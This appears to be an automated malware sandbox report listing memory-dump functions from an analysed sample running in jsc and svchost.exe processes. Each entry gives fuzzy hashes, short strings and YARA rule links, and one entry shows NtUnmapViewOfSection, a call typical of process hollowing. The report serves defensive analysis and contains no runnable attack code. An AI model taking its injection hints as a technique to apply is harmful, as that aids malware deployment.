Opcode Fuzzy Hash: e33e8a3ffcc1263e01d10668c30b94cd3d00c11b4b045745d226c0591ab1c5ae
Instruction Fuzzy Hash: 4C11E576B012559FCB44EFB5A94975E7BF9EB886A0F204876F905E7300EE38C8418781

Function 0301148A Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 297fdd0d937e3ee35eacfe06be33a207ada8113f0d635e955cb02ecc491ee6ce
Instruction ID: 690877dcb0dd89a31b3c080c6cf0315bee72a634790c4cb0aa74e9a70a7dad88
Opcode Fuzzy Hash: 297fdd0d937e3ee35eacfe06be33a207ada8113f0d635e955cb02ecc491ee6ce
Instruction Fuzzy Hash: 0311C231A02315DBCB29EFB888502AE7BF5EB48614B1804B9D905EB345E635C952CB91

Function 03011498 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bcae0482bbb4b1f1457cbd5b782f5b6b0ec8d8b177aeae1cbf737faaa3a20d7
Instruction ID: 006a67a9226a8a013aee28a3092781547d19c6aa70a9d71dd568d9ece6f7a52a
Opcode Fuzzy Hash: 5bcae0482bbb4b1f1457cbd5b782f5b6b0ec8d8b177aeae1cbf737faaa3a20d7
Instruction Fuzzy Hash: C2019235A02315DFCF69EFB884502AEBBF5EF88210F14047AD905EB304E635D891CB91

Function 0138D02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3401615605.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_138d000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: 1d2bb004d70770f0072200c21285239f6dbe9c3105ab9594def0b50b523e5b49
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: 2A11BBB5504384CFCB12DF54D9C0B15BBA1FB84318F28C6AAD8494B6A7C33AD44BCB62

Function 030180F1 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e3cf1e5c426d77870e785f674c634dbb6b1105fde5e106b808a385f6ae26ad7
Instruction ID: 17e2f4240a56338a8c7bae77fac97779152e2fceb418dd376eb62cdd293c72b5
Opcode Fuzzy Hash: 3e3cf1e5c426d77870e785f674c634dbb6b1105fde5e106b808a385f6ae26ad7
Instruction Fuzzy Hash: 85016D74A0014AEBDB05FFA8F98168D7BB1EBC0304F50527CC905AB250EE796E059B90

Function 03011524 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b9bf9918d5b83686bd1db4701631a7e619af6149e7d679f8687bd3c7c601c37
Instruction ID: 24d76cc980d7c8ca85333d59dbb2d1ce6aef654d88befd2180c5208384c82543
Opcode Fuzzy Hash: 9b9bf9918d5b83686bd1db4701631a7e619af6149e7d679f8687bd3c7c601c37
Instruction Fuzzy Hash: 66F0F037A06210DFCB2ACBA898911ACBBB1EBA821171800DBDA46DB715D626D462CB11

Function 03017090 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fb9ebcb4bb69b2888489c79d97a130b04ff2902f2915b00d96ee4d576287aa3
Instruction ID: 759fc45f8f89574bd4cc9cd9886dee19346914b34f2ac9d381a6b0d85e8c9010
Opcode Fuzzy Hash: 2fb9ebcb4bb69b2888489c79d97a130b04ff2902f2915b00d96ee4d576287aa3
Instruction Fuzzy Hash: D6F0B239B00648CFC714DBA4E5A8A6C77B2EF89626F5040A9E5069B3A0CB35AD42DB40

Function 03018100 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f19e22df58219f43de0c117d2663f267a8df09d8aaf9c8384e1e7db5dd4435ea
Instruction ID: 5d9788221dcb645c2824af10991900473ea764d9b30e66b326cc45038b3057a3
Opcode Fuzzy Hash: f19e22df58219f43de0c117d2663f267a8df09d8aaf9c8384e1e7db5dd4435ea
Instruction Fuzzy Hash: DCF04F74A0014AEFDB09FFA8FA8159D7BB1EBC0300F50527CC505AB250EE792F049B91

Analysis Process: svchost.exePID: 7280, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	14%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	14.3%
Total number of Nodes:	21
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD34675EC6 Relevance: 9.7, Strings: 7, Instructions: 937
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(cn4, xrefs: 00007FFD34676641
yn4, xrefs: 00007FFD34675F0F
(cn4, xrefs: 00007FFD346763D3
H, xrefs: 00007FFD346763C6
(cn4, xrefs: 00007FFD34676600
(cn4, xrefs: 00007FFD34676414
ps4, xrefs: 00007FFD3467662A

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3466F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3466F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3466f000_svchost.jbxd

Similarity

API ID:
String ID: (cn4$(cn4$(cn4$(cn4$H$ps4$yn4
API String ID: 0-1949409858
Opcode ID: 5752c0b601eb22c34ccd09d618ae819f0e648b9c49ecb5ebb4cb98f74a7610e4
Instruction ID: 84a5fd759a001a84d809edd5110891e0fd3cdfee07bb6f2069b8479c3a0bd660
Opcode Fuzzy Hash: 5752c0b601eb22c34ccd09d618ae819f0e648b9c49ecb5ebb4cb98f74a7610e4
Instruction Fuzzy Hash: 7C420D31B1DE560BE7A98E2C4CB51B53BD2EF86224B4881BED54EC72E7DD1CEC069241

Function 00007FFD3467F711 Relevance: 9.6, Strings: 7, Instructions: 819
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`%s4, xrefs: 00007FFD3467FB4D
XNu4, xrefs: 00007FFD3467FA00
`%s4, xrefs: 00007FFD3467FCD5
XNu4, xrefs: 00007FFD3467FB78
@'s4, xrefs: 00007FFD3467F899
*M_H, xrefs: 00007FFD3467FA6E
XNu4, xrefs: 00007FFD3467FD23

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3467B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3467B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3467b000_svchost.jbxd

Similarity

API ID:
String ID: *M_H$@'s4$XNu4$XNu4$XNu4$`%s4$`%s4
API String ID: 0-3558906143
Opcode ID: 8a3b4ff8794365ebaab686d9c2de2e3e96acee82f56fddb77f22268f3b5f97e3
Instruction ID: ca6f37f080b43c5f84290319fb16dcf84684d201262f03db582e053d972f55d8
Opcode Fuzzy Hash: 8a3b4ff8794365ebaab686d9c2de2e3e96acee82f56fddb77f22268f3b5f97e3
Instruction Fuzzy Hash: D0427371B18A198FDB98DF18C8A5BA977E1FF59304F1481BAD04DD7292DE38E881CB41

Function 00007FFD3467DCE1 Relevance: 5.9, Strings: 4, Instructions: 853
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`%s4, xrefs: 00007FFD3467DD7C
`%s4, xrefs: 00007FFD3467DDCC
@'s4, xrefs: 00007FFD3467E055
@'s4, xrefs: 00007FFD3467DE22

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3467B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3467B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3467b000_svchost.jbxd

Similarity

API ID:
String ID: @'s4$@'s4$`%s4$`%s4
API String ID: 0-2188010694
Opcode ID: 1b58d01a951e760dd7f6c3240ebfaba7520701cb65841efeecedcdc44bf2c2c2
Instruction ID: 5a824dc4dd949fd3079125025599a1ef52c7d938f0cf28d6388af9048bc5bb94
Opcode Fuzzy Hash: 1b58d01a951e760dd7f6c3240ebfaba7520701cb65841efeecedcdc44bf2c2c2
Instruction Fuzzy Hash: 0352E230B1CB564FEBA8DA18D8A16B977D1FF96310F10857DD08EC3686DE38E8469781

Function 00007FFD3466721D Relevance: 3.3, Strings: 2, Instructions: 759COMMON

Download Yara Rule

Strings

8is4, xrefs: 00007FFD3466774E
HfS4, xrefs: 00007FFD346677BB

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3465D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3465D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3465d000_svchost.jbxd

Similarity

API ID:
String ID: 8is4$HfS4
API String ID: 0-1756821087
Opcode ID: 8b8b2fd36806b10cdea9fd40cb18fcd4891803cfb454b5663ce6a5f1cf6afcdc
Instruction ID: ab1b36006ae967df87ebe65f1358bd1ce8278ebb15fa308042a84e233c7a52b3
Opcode Fuzzy Hash: 8b8b2fd36806b10cdea9fd40cb18fcd4891803cfb454b5663ce6a5f1cf6afcdc
Instruction Fuzzy Hash: D932D231B18A594FEB94EF2CD8A4AA977E1FF59311F0401BAE54DC72A2DE28EC41C741

Function 00007FFD34693C20 Relevance: 3.1, Strings: 2, Instructions: 592COMMON

Download Yara Rule

Strings

fish, xrefs: 00007FFD34693DA0
K_L, xrefs: 00007FFD34693E6E

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd34690000_svchost.jbxd

Similarity

API ID:
String ID: fish$K_L
API String ID: 0-2883392872
Opcode ID: bc9d2b5af478130ea93e4d5fb112ec670f13e92cab09bc2895ce3869895aeca4
Instruction ID: 3a1bd52a34a18be65715e23209fa2b80d478beb903e758ab41e5031a8b6dec4a
Opcode Fuzzy Hash: bc9d2b5af478130ea93e4d5fb112ec670f13e92cab09bc2895ce3869895aeca4
Instruction Fuzzy Hash: 2E027A72B0DA960FE7599E6898B51F53BE1EF97210B0801BFD18AC72D3DD58EC468381

Function 00007FFD3467EE85 Relevance: 2.2, Strings: 1, Instructions: 921COMMON

Download Yara Rule

Strings

(Wu4, xrefs: 00007FFD3467F65C

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3467B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3467B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3467b000_svchost.jbxd

Similarity

API ID:
String ID: (Wu4
API String ID: 0-1590499838
Opcode ID: c0631fe6fe78027bbae0612ffadd0c0a2495d8bbc6ebce395a78be82ec930f64
Instruction ID: 6488e573cac94354e739adc1a010a1b56195cc65012caff0598432d9e64e3c8f
Opcode Fuzzy Hash: c0631fe6fe78027bbae0612ffadd0c0a2495d8bbc6ebce395a78be82ec930f64
Instruction Fuzzy Hash: 02629430A08A598FDB98DF28C8A5AA97BE1FF59304F1441BED54DD7296DE38EC41CB40

Function 00007FFD346727D9 Relevance: 2.1, Strings: 1, Instructions: 861COMMON

Download Yara Rule

Strings

`%s4, xrefs: 00007FFD34672A97

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3466F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3466F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3466f000_svchost.jbxd

Similarity

API ID:
String ID: `%s4
API String ID: 0-21131924
Opcode ID: 574679f20a1281d6bbf1e788be46dee57055b58bbf5607c70577947db6ac8c45
Instruction ID: 8c69afd2e0ef57aef53c60b41016be211c0a28c3de00673c0ab6dfe40c53268b
Opcode Fuzzy Hash: 574679f20a1281d6bbf1e788be46dee57055b58bbf5607c70577947db6ac8c45
Instruction Fuzzy Hash: 5C42903071C9554FEB6C9F1CA8A5AA83BD1EF5A300F1440BEE54EC72A7DE28EC429745

Function 00007FFD3466A71D Relevance: 2.1, Strings: 1, Instructions: 845COMMON

Download Yara Rule

Strings

psn4, xrefs: 00007FFD3466A92A

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3465D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3465D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3465d000_svchost.jbxd

Similarity

API ID:
String ID: psn4
API String ID: 0-3322288917
Opcode ID: e8e08d6119fbf2c7b6b9fcdff2ca98b923bd646f5e6f3abddb85c5060e1620a5
Instruction ID: a34c7a921a8ba17af1e1cec47ac3a20dd1890d5cdc228d84d17ac9d1fdac2339
Opcode Fuzzy Hash: e8e08d6119fbf2c7b6b9fcdff2ca98b923bd646f5e6f3abddb85c5060e1620a5
Instruction Fuzzy Hash: AA42F771B0CA594FEB58DE58D8A56F977E1EF96324F04017BD18EC7283DE2CA8429780

Function 00007FFD3466C3EA Relevance: 2.1, Strings: 1, Instructions: 839COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD3466C739

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3466C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3466C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3466c000_svchost.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 0b09d7ec1b6e9c2c131aed6ea9f0050a0f223cad9f45e96d729b3a9767ef0513
Instruction ID: dde77dd812ed9bb87b475a451dd98202929b82804b8369d5fffd31b65eb5a55d
Opcode Fuzzy Hash: 0b09d7ec1b6e9c2c131aed6ea9f0050a0f223cad9f45e96d729b3a9767ef0513
Instruction Fuzzy Hash: 6142F932B0CA664FEB50EF9CD4A55FA7BA0EF96335B144176D18CD7183CE2CA8468790

Function 00007FFD34691E08 Relevance: 2.0, Strings: 1, Instructions: 739COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD3469449F

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd34690000_svchost.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 7f5f80cc8aaecbd2a3ee8d8fb045ef5d248f395037cf50bade214c1406c85b45
Instruction ID: 917bba302c12d09332abdeeaa269e680b42993bf84a4f402fe6e62233c2819ee
Opcode Fuzzy Hash: 7f5f80cc8aaecbd2a3ee8d8fb045ef5d248f395037cf50bade214c1406c85b45
Instruction Fuzzy Hash: 1D223231B1CA4A4FE758DF6894E25B177D0EF56318B1442BAD58EC7297DE28F8438780

Function 00007FFD346AD66A Relevance: 1.6, APIs: 1, Instructions: 108nativeCOMMON

Download Yara Rule

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FFD346AD70B

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD346A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd346a6000_svchost.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: e31a7b0fca0fe47723908eac47fa976de240ef2878352699afd15356898b6a1c
Instruction ID: de7da55f3f171fc8c1bef62b9303749f9e61222b81436636dad69b7723af743c
Opcode Fuzzy Hash: e31a7b0fca0fe47723908eac47fa976de240ef2878352699afd15356898b6a1c
Instruction Fuzzy Hash: 1D31E570A0CA4C8FEB58DF98D88A7F97BE1EF96320F04416BD44DC3153D664A405CB51

Function 00007FFD34660C86 Relevance: 1.6, Strings: 1, Instructions: 303COMMON

Download Yara Rule

Strings

psn4, xrefs: 00007FFD34660D11

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3465D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3465D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3465d000_svchost.jbxd

Similarity

API ID:
String ID: psn4
API String ID: 0-3322288917
Opcode ID: f589440626b566fc1c4e4ac33e6f2cdaeec53d17f5b1edae930f90fee783bd64
Instruction ID: e1d29c34faf4b201ef196f6a2252e69f3defd48ac6c9b256fa9125c634fa9137
Opcode Fuzzy Hash: f589440626b566fc1c4e4ac33e6f2cdaeec53d17f5b1edae930f90fee783bd64
Instruction Fuzzy Hash: CB910231B0CA594FE759DB28C4A55B577E1EF96324B0402BED58EC7293DE2CF8428741

Function 00007FFD3467B355 Relevance: .7, Instructions: 749COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3467B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3467B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3467b000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 878d77410cd0d5dc153fe96a98c847b78479452a4322b1cfa7760d6a59477553
Instruction ID: ac0d7af97cb59f33dd9027cf1bee5ff2e510cf42756355c97097b44855cf659c
Opcode Fuzzy Hash: 878d77410cd0d5dc153fe96a98c847b78479452a4322b1cfa7760d6a59477553
Instruction Fuzzy Hash: 3E22F831B1CA554BE758AE2898A62F977C1FF9A704F14417EE18EC72C3DD2CB8029781

Function 00007FFD3467D033 Relevance: 14.2, Strings: 11, Instructions: 459
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

psn4, xrefs: 00007FFD3467D06C
&u4, xrefs: 00007FFD3467D1B0
&u4, xrefs: 00007FFD3467D192
&u4, xrefs: 00007FFD3467D105
&u4, xrefs: 00007FFD3467D13B
&u4, xrefs: 00007FFD3467D156
&u4, xrefs: 00007FFD3467D0EA
psn4, xrefs: 00007FFD3467D0B4
&u4, xrefs: 00007FFD3467D174
H, xrefs: 00007FFD3467D0AC
&u4, xrefs: 00007FFD3467D120

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3467B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3467B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3467b000_svchost.jbxd

Similarity

API ID:
String ID: H$psn4$psn4$&u4$&u4$&u4$&u4$&u4$&u4$&u4$&u4
API String ID: 0-3242506070
Opcode ID: 30d19ca365d8bd9d04f6b8fcee682874ce2c04becc58e794f10f18da54ef7da6
Instruction ID: d448fb267ad7933b777ad4bbf148bc757c4bf8456c87de57cbaeab9aebf54f72
Opcode Fuzzy Hash: 30d19ca365d8bd9d04f6b8fcee682874ce2c04becc58e794f10f18da54ef7da6
Instruction Fuzzy Hash: 20D12671B1DA4A4FEB58EA6C88A16F97BD1EF96314F0045BAD14EC7293DD2CF8028340

Function 00007FFD34667EE9 Relevance: 9.8, Strings: 7, Instructions: 1044
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

psn4, xrefs: 00007FFD346684DA
(cn4, xrefs: 00007FFD346686F5
`ks4, xrefs: 00007FFD346687CD
psn4, xrefs: 00007FFD3466878B
p(r4, xrefs: 00007FFD34668283
`ks4, xrefs: 00007FFD346687E3
psn4, xrefs: 00007FFD346680DC

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3465D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3465D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3465d000_svchost.jbxd

Similarity

API ID:
String ID: (cn4$`ks4$`ks4$p(r4$psn4$psn4$psn4
API String ID: 0-2151164295
Opcode ID: b6c6ff2c11c9b60d42630d9ddbd4e8f3edf6ac807e9302fbe2db7fd3792dade0
Instruction ID: 78f7117e031b42d88a40db8d707f700098e5adaae632b873ae7bdfcef82f1906
Opcode Fuzzy Hash: b6c6ff2c11c9b60d42630d9ddbd4e8f3edf6ac807e9302fbe2db7fd3792dade0
Instruction Fuzzy Hash: 7B629E30709A594FEBA4EF2C84A5BA577E1FF5A310F1401BAD58DCB2A7CE2CAC458741

Function 00007FFD346769D3 Relevance: 6.6, Strings: 5, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(cn4, xrefs: 00007FFD34676D53
ps4, xrefs: 00007FFD34676D3C
(cn4, xrefs: 00007FFD34676DEE
XNu4, xrefs: 00007FFD34676A86
hEu4, xrefs: 00007FFD34676B22

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3466F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3466F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3466f000_svchost.jbxd

Similarity

API ID:
String ID: (cn4$(cn4$XNu4$hEu4$ps4
API String ID: 0-4263147738
Opcode ID: 6964ff9a6df90f6cad5d722e70479a51cbe1255728c591d8c21eecd8cdb5b1d4
Instruction ID: 92d8e7aa45f5160cf450109633fd6c8eae6a0b0de34200b2f92308e6ca11c755
Opcode Fuzzy Hash: 6964ff9a6df90f6cad5d722e70479a51cbe1255728c591d8c21eecd8cdb5b1d4
Instruction Fuzzy Hash: DD91F631B18A1A4FDB58DF1CC8A5AF577D1FF96324F448279D54EC36A2DE28B8428780

Function 00007FFD346713FD Relevance: 4.5, Strings: 3, Instructions: 791
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@'s4, xrefs: 00007FFD34671721
@'s4, xrefs: 00007FFD34671568
@'s4, xrefs: 00007FFD346715BB

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3466F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3466F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3466f000_svchost.jbxd

Similarity

API ID:
String ID: @'s4$@'s4$@'s4
API String ID: 0-191214578
Opcode ID: 9023ea45a9d41346244b0d703ef211d41ed5dd13e8e90d67a3b5dbff02a4b5cb
Instruction ID: 93db53c38a7c8e5d721305d787bed3c5c90f8d7f03dad339ad651de2e8825582
Opcode Fuzzy Hash: 9023ea45a9d41346244b0d703ef211d41ed5dd13e8e90d67a3b5dbff02a4b5cb
Instruction Fuzzy Hash: 3F32913071CA154FEB58EF2C98A5AA477D2FF5A300F1541BAE54DC73A6DE28EC428781

Function 00007FFD34683C11 Relevance: 4.5, Strings: 3, Instructions: 778
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

psn4, xrefs: 00007FFD34683FCC
psn4, xrefs: 00007FFD34684159
4, xrefs: 00007FFD34683C28

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD34682000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34682000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd34682000_svchost.jbxd

Similarity

API ID:
String ID: 4$psn4$psn4
API String ID: 0-4036968624
Opcode ID: 8422813d0503722070e4e791118a5acca489fa7c29a2a6f63b5c1f8ee2d4437b
Instruction ID: 6c18f2a7dfbc618387cbd439403aab8c1b10bde8f8b5f3915aaac94db868fd0e
Opcode Fuzzy Hash: 8422813d0503722070e4e791118a5acca489fa7c29a2a6f63b5c1f8ee2d4437b
Instruction Fuzzy Hash: CA325E307089594FEBD4EF2CD4A8BB577D2EFA9341B0901BAD54DC72A6DE29EC418740

Function 00007FFD3465E648 Relevance: 4.1, Strings: 3, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

psn4, xrefs: 00007FFD3465E83D
Pve4, xrefs: 00007FFD3465E9B9
psn4, xrefs: 00007FFD3465E89D

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3465D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3465D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3465d000_svchost.jbxd

Similarity

API ID:
String ID: Pve4$psn4$psn4
API String ID: 0-3343448903
Opcode ID: 7517d1cf4a86707b09d0652574941f8d8ba42831fa652ae36a40b2eb066624d4
Instruction ID: 5fd931aa55cd1d1ff64b88f13cf0ec5615e2b720cb0b2f3223e302dd2acc8cee
Opcode Fuzzy Hash: 7517d1cf4a86707b09d0652574941f8d8ba42831fa652ae36a40b2eb066624d4
Instruction Fuzzy Hash: EBC10922B1DA964FEB54EBACD4B16FA77D1EFD5318B0445BAC18EC7183DD28B8468340

Function 00007FFD34678860 Relevance: 4.1, Strings: 3, Instructions: 379
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@du4, xrefs: 00007FFD34678C48
p(r4, xrefs: 00007FFD34678AED
p(r4, xrefs: 00007FFD346789C5

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3466F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3466F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3466f000_svchost.jbxd

Similarity

API ID:
String ID: @du4$p(r4$p(r4
API String ID: 0-1461042272
Opcode ID: 2755001c22e0780e935b3f7050983c0db14d03dc8cc3f610ea4902d274566778
Instruction ID: 26c58e2f8f3d5c418b715f11910d3e066750c76d52eb0718b227b7cf7de7e51a
Opcode Fuzzy Hash: 2755001c22e0780e935b3f7050983c0db14d03dc8cc3f610ea4902d274566778
Instruction Fuzzy Hash: 50D10870A1C7C64FD7659F2888992FA7BD1EF96300F1446BEC58DC7292DE38AC429742

Function 00007FFD3465E6F2 Relevance: 4.1, Strings: 3, Instructions: 318
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

psn4, xrefs: 00007FFD3465E83D
Pve4, xrefs: 00007FFD3465E9B9
psn4, xrefs: 00007FFD3465E89D

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3465D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3465D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3465d000_svchost.jbxd

Similarity

API ID:
String ID: Pve4$psn4$psn4
API String ID: 0-3343448903
Opcode ID: ebb3bf3862313b5256c65b1155e843770b1a4e374b46c01de03d7d51a89fd9ec
Instruction ID: ea3779d0f3d8cfe7cea19763a80d7cb1c6fbe8d0f1e32e88556b1c457c90ca34
Opcode Fuzzy Hash: ebb3bf3862313b5256c65b1155e843770b1a4e374b46c01de03d7d51a89fd9ec
Instruction Fuzzy Hash: 58A1F862B1DA964FEB55EF6CC4A16FA73D1FFA5304B0441BAC18EC7287DD28B8468340

Function 00007FFD346AD86D Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

U4, xrefs: 00007FFD346AD92E

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD346A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd346a6000_svchost.jbxd

Similarity

API ID:
String ID: U4
API String ID: 0-3270928221
Opcode ID: 79d86c405855f36abf0e3b470ae5112b8247d48c2e85813118208a0492f47ac7
Instruction ID: 72c4430637181a6652b3665ae207f728ab8525e6b0559f0e3bc73db4cc298a68
Opcode Fuzzy Hash: 79d86c405855f36abf0e3b470ae5112b8247d48c2e85813118208a0492f47ac7
Instruction Fuzzy Hash: 21716C71A0DB994FE759DB28C8965E9B7E1FF96310F00017FD089C3193DA78A846C782

Function 00007FFD3467327D Relevance: 3.7, Strings: 2, Instructions: 1191COMMON

Download Yara Rule

Strings

&u4, xrefs: 00007FFD34673B12
p(r4, xrefs: 00007FFD346732DF

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3466F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3466F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3466f000_svchost.jbxd

Similarity

API ID:
String ID: p(r4$&u4
API String ID: 0-4172212449
Opcode ID: 2e8f695f58b67c2473a1d9bb9d60d4fc1634bdffe1884ef251f7497c85f1bc64
